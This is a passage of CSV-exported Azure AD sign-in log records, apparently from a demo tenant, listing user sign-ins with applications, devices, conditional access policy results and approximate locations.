'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",706e1892-a48a-4a34-be7e-87776bba1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,706e1892-a48a-4a34-be7e-87776bba1100,SigninLogs,Sucess,41.90428925,-85.99833679
+2083,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:16.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:45,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",89ecc402-b95e-4339-957d-8ca81e874300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,89ecc402-b95e-4339-957d-8ca81e874300,SigninLogs,Sucess,35.01296997,-80.93171692
+2084,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:16.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:45,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",89ecc402-b95e-4339-957d-8ca81e874300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,89ecc402-b95e-4339-957d-8ca81e874300,SigninLogs,Sucess,35.01296997,-80.93171692
+2085,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:17.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37ca469f-30d6-0000-470e-406efe410963,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c6df9c5c-6712-4175-a3db-58ceee2d1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c6df9c5c-6712-4175-a3db-58ceee2d1300,SigninLogs,Sucess,41.90428925,-85.99833679
+2086,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:17.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37ca469f-30d6-0000-470e-406efe410963,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c6df9c5c-6712-4175-a3db-58ceee2d1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c6df9c5c-6712-4175-a3db-58ceee2d1300,SigninLogs,Sucess,41.90428925,-85.99833679
+2087,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:59.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ad8801a-a0ea-43e1-b106-94998e672129,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",325d7c9c-ae51-4f5f-a5f7-8aa4b0de1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,325d7c9c-ae51-4f5f-a5f7-8aa4b0de1000,SigninLogs,Sucess,41.90428925,-85.99833679
+2088,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:58.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0726ec53-50df-4f89-8a9b-4f247754c7b0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5423bf62-9037-4448-bcaa-30335e461100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5423bf62-9037-4448-bcaa-30335e461100,SigninLogs,Sucess,41.90428925,-85.99833679
+2089,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:26.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b9732005-2698-4253-b3a8-6b37688f3c68,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d57fb780-1a14-4a75-9a44-f6b097591300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d57fb780-1a14-4a75-9a44-f6b097591300,SigninLogs,Sucess,50.6406517,5.572050095
+2090,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:41.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4ecc3f38-f01f-4f28-894e-67c85735fc5e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 